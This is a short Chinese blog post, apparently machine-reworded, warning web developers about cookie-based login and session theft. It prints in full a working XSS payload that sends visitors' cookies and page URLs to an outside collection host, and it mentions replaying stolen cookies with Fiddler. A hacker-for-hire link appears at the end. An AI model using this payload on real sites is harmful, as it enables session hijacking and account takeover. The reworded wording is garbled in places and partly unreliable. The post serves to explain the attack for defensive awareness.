作为一个web开发者，避免不了用户登录功用，但是有多少知道用户登录的一些安全防备技能呢？

 

一般的菜鸟只知道把用户信息保存到Cookie 即可，登录只管判别Cookie是否存在，凭借着cookie值的存在状况来判别用户是否登录，更有一些乃至把用户暗码也保存在Cookie中，这是极端风险的，人家要搞你分分钟能够模仿你的Cookie来登录你的用户，做一些风险的工作。

1、进犯者怎样拿到你的登录的Cookie值。

现在各种进犯技能，现在我只了解XSS进犯方式，就在前一段时间，我自己建立了一个自己的社区站点 在群里边评论遇到了一个大神，做过一个XSS进犯的测验，他在我的社区里边发布了一篇博客，里边嵌入了XSS进犯脚步，脚步代码如下：

(function(){(new Image()).src='http://xss.sssie.com/index.php?do=api&id=RQTPpx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})(); if(''==1){keep=new Image();keep.src='http://xss.sssie.com/index.php?do=keepsession&id=RQTPpx&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

这段代码，是经过第三方XSS渠道来的，不过现在有许多的免费XSS渠道，自己也能够建立一个。

经过嵌入以上脚步，只需用户登录了自己的帐号，一旦阅读了进犯者发布的博客，即进犯成功，XSS第三方渠道里边发送有关我登录的Cookie 给进犯者，这样你登录的Cookie值立马给盗取，是不是很风险呢？

2、进犯者模仿Cookie登录

做过后台开发的人都知道怎样模仿Cookie信息去登录，除非是菜鸟，这个我就不多说了，

不过不会后台开发的人，会运用一些东西，比方Fiddler 就很简单把Cookie信息模仿登录了，这儿就不逐个叙述完成进程了

[1] [2]  黑客接单网